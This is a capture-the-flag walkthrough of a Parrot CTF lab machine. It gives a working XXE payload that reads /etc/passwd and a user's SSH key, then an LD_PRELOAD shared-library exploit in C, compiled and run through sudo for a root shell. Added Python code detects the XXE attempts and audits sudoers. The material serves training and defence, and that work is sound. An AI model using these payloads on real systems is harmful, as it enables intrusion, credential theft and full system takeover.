Blogger

  • Parrot-CTF
  • Easy

🦜 Parrot CTFs is an advanced cybersecurity education platform and Capture The Flag provider. Their goal is to create the most realistic Capture The Flag challenges and demonstrate real-world attack scenarios.

This is a medium difficulty machine that exploits an XXE vulnerability and dynamic linker hijacking with LD_PRELOAD to gain root privileges.

Enumeration 🔎:

We start by using ping to check the TTL of the machine to determine the OS we are dealing with.

Based on the TTL value of 63, we can infer that the machine is running Linux. This is not certain, but it gives us an idea. For more information, you can view: Identify OS using TTL value.

Now, let’s go with an nmap scan to view the open ports.

sudo nmap -p- --open -sS --min-rate 5000 -n -v -Pn 10.14.0.12 -oN allPorts

-p- –> We are doing a scan against all 65535 ports to search for open ports.

--open –> It will only report open ports.

-sS –> TCP SYN scan: it never completes the TCP handshake, so it can be performed quickly, scanning thousands of ports per second.

--min-rate 5000 –> It sets the minimum rate of packets sent per second to 5000.

-n –> Tells Nmap to never do reverse DNS resolution on the active IP addresses it finds.

-v –> It will be verbose in its output.

-Pn –> This option skips the host discovery stage.

-oN –> It will save the output in a file called “allPorts”.

We find out the following open ports:

Let’s take a look at what the page has.

Well, we can’t see any of the posts because we get a 404 error, but we can see something interesting: a search button.

XXE 💉:

Let’s take a closer look at sending a request, intercepting it with Burp Suite, and sending the request to Repeater for further analysis.

I tried SQL injection payloads, but they didn’t work. So, I tried different combinations of other payloads and saw this interesting response.

Basically, our input is being placed inside an XML structure, so maybe it is vulnerable to XXE (XML External Entity) injection? Let’s check it out.

We can search for payloads in PayloadsAllTheThings, and I used the classic XXE to retrieve files.

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>

IMPORTANT: You need to URL-encode the ampersand (&) because if you don’t, it will not work. It should be %26.

It works! Now, searching for the word bash, we can see two users: jimmy and root.
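On the defensive side, the same payload is easy to spot and easy to refuse. The following is an added example (not code from the original post): it runs a detector over constructed access-log lines that carry the writeup’s payload in fully URL-encoded form and in the minimal form with only the ampersand encoded as %26, and it shows a parser wrapper that rejects any document declaring a DOCTYPE or entity before it is parsed. The log lines, the client IPs and the /search?q= endpoint are assumptions for the demo; only the payload itself comes from the post.

```python
import re
import urllib.parse
import xml.etree.ElementTree as ET
import xml.parsers.expat
from typing import List, Tuple

# The payload used in the writeup (the only non-constructed value here).
XXE_PAYLOAD = ("<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM "
               "'file:///etc/passwd'>]><root>&test;</root>")

# Constructed sample access-log lines (not from the original post). Line 1 is the
# payload fully URL-encoded, line 2 only has the ampersand encoded as %26 (the
# minimum the post says is needed), line 3 is an ordinary search.
SAMPLE_LOG = """\
10.14.0.99 - - [01/Jan/2024:12:00:00 +0000] "GET /search?q=%3C%3Fxml+version%3D%221.0%22%3F%3E%3C%21DOCTYPE+root+%5B%3C%21ENTITY+test+SYSTEM+%27file%3A%2F%2F%2Fetc%2Fpasswd%27%3E%5D%3E%3Croot%3E%26test%3B%3C%2Froot%3E HTTP/1.1" 200 1023
10.14.0.99 - - [01/Jan/2024:12:00:05 +0000] "GET /search?q=<?xml+version=%221.0%22?><!DOCTYPE+root+[<!ENTITY+test+SYSTEM+'file:///etc/passwd'>]><root>%26test;</root> HTTP/1.1" 200 1023
10.14.0.50 - - [01/Jan/2024:12:00:09 +0000] "GET /search?q=linux+tips HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?:[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A DOCTYPE or ENTITY declaration has no business in a search parameter.
DTD_RE = re.compile(r"<!(?:DOCTYPE|ENTITY)\b")


def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode until stable so double-encoded payloads do not slip past."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_xxe_requests(log_text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, decoded_query) for requests that carry a DTD."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        query = urllib.parse.urlsplit(match.group("target")).query
        decoded = fully_decode(query)
        if DTD_RE.search(decoded):
            hits.append((client_ip, decoded))
    return hits


def parse_untrusted_xml(text: str) -> ET.Element:
    """Parse XML from a user, refusing any document that declares a DTD.

    A first pass with expat aborts as soon as a DOCTYPE or entity declaration
    is seen; only documents without one reach ElementTree.
    """
    guard = xml.parsers.expat.ParserCreate()

    def reject(*_):
        raise ValueError("DOCTYPE/entity declarations are not accepted")

    guard.StartDoctypeDeclHandler = reject
    guard.EntityDeclHandler = reject
    guard.Parse(text, True)  # ValueError on DTD, ExpatError on malformed input
    return ET.fromstring(text)


def accepts_xml(text: str) -> bool:
    """True if parse_untrusted_xml would accept the document."""
    try:
        parse_untrusted_xml(text)
        return True
    except (ValueError, xml.parsers.expat.ExpatError, ET.ParseError):
        return False


if __name__ == "__main__":
    for ip, query in flag_xxe_requests(SAMPLE_LOG):
        print(f"XXE attempt from {ip}: {query[:60]}...")
    print("payload accepted:", accepts_xml(XXE_PAYLOAD))
```

Decoding the query repeatedly before matching is what makes the %26 trick (and double encoding) irrelevant to the detector; refusing the DTD up front, rather than trusting parser defaults, is the fix that does not depend on which XML library the application happens to use.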

Now we can search for configuration files, enumerate internal ports, and so on. But let’s focus on enumerating the web page more.

We can fuzz the web page to search for directories with tools like gobuster, wfuzz, ffuf, dirsearch… but I am going to use dirsearch in this case.

dirsearch -u http://10.14.0.12/

And we found the /management directory:

We found this note in /management/admins/temp:

We found this other note in /management/employees/jimmy, the same user that we saw earlier:

An id_rsa file in /home/jimmy/ssh/id_rsa.bak?? 😳 Let’s try to retrieve the file with the XXE vulnerability.

With this we can log in to the system as the user jimmy over SSH: copy the id_rsa text from Burp Suite, put it in a file, change the permissions of the file to 400 with chmod 400 id_rsa, and connect with it:

ssh -i id_rsa jimmy@10.14.0.12

Now that we are inside the machine, there is one thing you need to do to ensure smooth operation:

  1. export TERM=xterm

This will allow us to clean the screen with ctrl + l.

Now we can see the flag 🎉.

Privilege escalation 🚩:

We need to enumerate the system to find a way to escalate privileges.

One thing I always check first is sudo -l. This command helps us determine if we have the ability to execute commands as another user. If we are lucky, we might discover that we can execute commands with the privileges of the root user.

For more info about privilege escalation techniques, check here.

We can see something interesting: env_keep+=LD_PRELOAD.

A quick search in Google tells us that we can escalate privileges with it.
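The sudo -l output is only shown as a screenshot in the post, so here is an added example (not the post’s own code) of how an administrator would audit that output, or the sudoers file itself, for the misconfiguration in question: it extracts every variable that env_keep preserves, keeps only the dynamic loader variables, lists the commands runnable as root, and combines both into a verdict. The sample sudo -l text and sudoers fragment are constructed; the hostname blogger and the ping path follow the writeup, everything else in them is assumed.

```python
import re
from typing import Dict, List

# Constructed sample `sudo -l` output (the post only shows it as a screenshot).
# Hostname "blogger" and the ping path follow the writeup; the rest is assumed.
SAMPLE_SUDO_L = """\
Matching Defaults entries for jimmy on blogger:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User jimmy may run the following commands on blogger:
    (root) /usr/bin/ping
"""

# Constructed sudoers fragment in file syntax, to show the quoted multi-value form.
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults env_keep += "XDG_DATA_DIRS"
Defaults env_keep += "LD_PRELOAD LD_LIBRARY_PATH"
Defaults env_keep -= "LD_AUDIT"
jimmy ALL=(root) /usr/bin/ping
"""

# Variables that let the caller influence the dynamic loader of the privileged
# process; sudo's env_reset strips them unless env_keep adds them back.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}

# Matches env_keep=..., env_keep+=..., env_keep-=..., quoted or bare values.
ENV_KEEP_RE = re.compile(r'env_keep\s*([+-]?)=\s*(?:"([^"]*)"|([^,\s]+))')
# Matches "(root) /usr/bin/ping" style entries, with or without NOPASSWD.
RUNAS_RE = re.compile(r"\((?P<runas>[^)]+)\)\s*(?:NOPASSWD:\s*)?(?P<cmd>\S.*)$")


def dangerous_env_keep(text: str) -> List[str]:
    """Loader variables that env_keep preserves, from sudoers or `sudo -l` text."""
    kept = set()
    for op, quoted, bare in ENV_KEEP_RE.findall(text):
        if op == "-":
            continue  # env_keep -= removes a variable, so it is not a problem
        kept.update((quoted or bare).split())
    return sorted(kept & LOADER_VARS)


def root_commands(text: str) -> List[str]:
    """Commands that the text says may be run as root (or as ALL)."""
    cmds = []
    for line in text.splitlines():
        m = RUNAS_RE.search(line.strip())
        if m and m.group("runas").split(":")[0].strip() in ("root", "ALL"):
            cmds.append(m.group("cmd").strip())
    return cmds


def audit(text: str) -> Dict[str, object]:
    """Combine both findings into one verdict."""
    vars_kept = dangerous_env_keep(text)
    cmds = root_commands(text)
    return {
        "loader_vars": vars_kept,
        "root_commands": cmds,
        # Any root command plus a kept loader variable is a full escalation path.
        "escalation_possible": bool(vars_kept and cmds),
    }


if __name__ == "__main__":
    for name, sample in (("sudo -l", SAMPLE_SUDO_L), ("sudoers", SAMPLE_SUDOERS)):
        print(name, audit(sample))
```

The remediation is simply to delete the env_keep entry for LD_PRELOAD (and any other LD_* variable) from sudoers and rely on env_reset, which is the default; nothing that legitimately needs LD_PRELOAD should be reachable through sudo.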

We can go to the /tmp directory and create an exploit like this:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs when the library is loaded: with -nostartfiles this _init is our own
 * constructor instead of the one libc would normally provide. */
void _init() {
	unsetenv("LD_PRELOAD");  /* don't preload ourselves into the child shell */
	setgid(0);
	setuid(0);               /* the sudo'd process already runs as root */
	system("/bin/bash");
}

Save the file as whatever.c and compile it with:

gcc -fPIC -shared -o whatever.so whatever.c -nostartfiles

This will create a whatever.so file, which we then load by executing:

sudo LD_PRELOAD=/tmp/whatever.so /usr/bin/ping

And now we are root :)

Hope you like it and learn something new :)